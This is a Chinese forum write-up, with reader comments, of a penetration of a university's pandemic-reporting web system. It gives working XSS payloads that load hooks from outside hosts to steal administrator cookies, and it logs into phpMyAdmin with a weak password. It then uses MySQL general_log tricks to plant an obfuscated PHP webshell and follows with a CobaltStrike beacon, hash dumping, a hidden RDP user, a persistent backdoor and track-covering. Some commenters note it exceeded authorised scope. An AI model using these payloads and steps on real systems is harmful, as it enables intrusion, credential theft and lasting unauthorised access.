某高校疫情系统渗透测试
0x01 信息收集:
服务: 阿里云上
子域名: app.xxx.xxx
框架: Kohana v2.3.4二次开发(3.2.3之前记得有命令执行)
阿里云BanIP
疫情情况微信提交二维码:
手动随意猜下目录,报错,得到版本号 (Kohana v2.3.4)
0x02 手动测试:
登录框测试了SQL注入,貌似没有:
测试XSS看源代码,uesrname:
测了 usernmae 和 跳转info参数都可控,没有一点处理!
构造XSS,闭合标签(输入的用户名,直接保存为Cookies,这程序员有点...):
Payload 构造:
构造闭合标签:
" > <script>alert(document.cookie)</script> # 最基础XSS
" > <scRipt>srC=//xs.sb/NKQE></scRIpT> # 大小写改下,添加链接
" > </script></textarea><img/src=xyz OnErRor=alert('loecho')> # 通过oneErRor构造!
直接改就可以了,加上js地址!
换个方式(加个换行):
</tExtArEa> " > <sCRiPt sRC=//xsshs.cn/NKQE></sCrIpT>,看解析结果
优化一下:
" > <sCRiPt sRC=//xs.sb/NKQE></sCrIpT>
BEeF 平台上一下看看:
[url]http://Mr00t.loehco.me:3000/hook.js[/url] # 源地址
短域名处理:
[url]https://goo.su/0J16[/url]
构造标签:
</tExtArEa> " > <sCRiPt sRC=//goo.su/0J16></sCrIpT>
"> </script></textarea><img/sRC=//xs.sb/NKQE OnErRor=alert('loecho')>
微信表单,猜测也不用测试了,一样...
直接平台配置一下XSS,插在表单里:
疫情情况填写严重点….
容易让管理员看!:
收到!Cookies
替换直接登录,刚开始以为是用户权限不够,后来收到一堆管理员的Cookies,功能都一样,就一个..
直接上XSS-BeeF 平台,劫持,都是微信提交表单,应该都可以劫持!
没啥功能没有shell的点,想的构造一个xssFlash更新钓鱼,后来想了想这特殊时期,怂了...
看子站把,也是阿里云,登录界面都一样,只是改了改字(这...):
因为阿里云没扫目录,就手动测了一下,有PHPINFO,环境是phpstudy阿里云开windows用phpstudy???
手动测试发现,存在phpmyadmin,上去看了下,试了几个弱口令,狗屎运了 弱口令: 123456,登录查看:
找到管理员表,这名字,(专家)打扰了..
Cmd5跑一下,得到密码:(这密码!!!这是浪费时间了)
登陆后台,一模一样的东西换汤不换药,还是没有啥功能:
没啥功能点shell,拿phpmyadmin写
1.看下全局日志,是否开启
2.开启,设置general_log为on,并且把日志存放路径设置为网站根目录。
set global general_log = "ON";
SET global general_log_file='C:/phpStudy/WWW/data.php';
这时候我们查询,就OK了
select '<?php
class UYNF {
function jrVL() {
$mtJA = "\x5b" ^ "\x3a";
$pWvd = "\xed" ^ "\x9e";
$zCMe = "\xd5" ^ "\xa6";
$pPhq = "\x18" ^ "\x7d";
$JgSX = "\xd6" ^ "\xa4";
$xLWN = "\x4f" ^ "\x3b";
$DqQl =$mtJA.$pWvd.$zCMe.$pPhq.$JgSX.$xLWN;
return $DqQl;
}
function __destruct(){
$esSR=$this->jrVL();
@$esSR($this->wy);
}
}
$uynf = new UYNF();
@$uynf->wy = isset($_GET['id'])?base64_decode($_POST['loecho']):$_POST['loecho'];
?>';
子站貌似是个疫情知识的微信测试后端:
3.因为目标在阿里云上,直接连肯定封ip,用先知上的一个师傅的方法,用垃圾流量混淆数据包,给蚁剑添加编码器就可以实现:
连接看下权限,admin,提权都省了:
0x03 上 CobaltStrike
蚁剑终端权限够,移动到System目录下,直接远程上马,Beacon回弹:
看下进程,杀毒都没有.:
dump一下hash
看下本地还有没有其他Web服务,就这一个:
主机有开3389,写个访客用户,guest,远程连一下
穿个免杀处理的后门,扔在自启动文件夹,防止重启后掉了 把源码dump下来,无聊时看看.. 阿里云Vps就不横向了,没啥必要了 擦屁股溜了..
评论78次
图片挂了。。。
https://xz.aliyun.com/t/7126 这是垃圾流量混淆数据包原贴,链接。
你测试超范围了,点到为止。这种打官司SRC也没办法
惊现 phpstudy
楼主也是呼市的?
渗透果然运气很重要啊...
疫情期间大家都是为了方便,临时上线,而且这段时间这种xi统敏感。。。
你头真铁,我们这里小区出入,商城进出,超市进出,也都有二维码登记,但是我从来没想过去检测...表示我头太软,惹不起
估计都是紧急上线的东西吧。。都没做那么细致
guest登陆终端不短信提醒吗
xss平台 cookie漏点了
补图片时候,忘了????
我是本地先写的,交src一份,改了改交这写了一份,图片弄混了????
xss平台 cookie漏点了
补图片时候,忘了????
https://xz.aliyun.com/t/7126 这是垃圾流量混淆数据包原贴,链接。
这个你可以上传到src不
已经上传,已修复
xss平台 cookie漏点了
这个你可以上传到src不
小马这个思路可以
图全挂了,补一下吧
图床用不了吗?已经补了
图片挂了。。。
图全挂了,补一下吧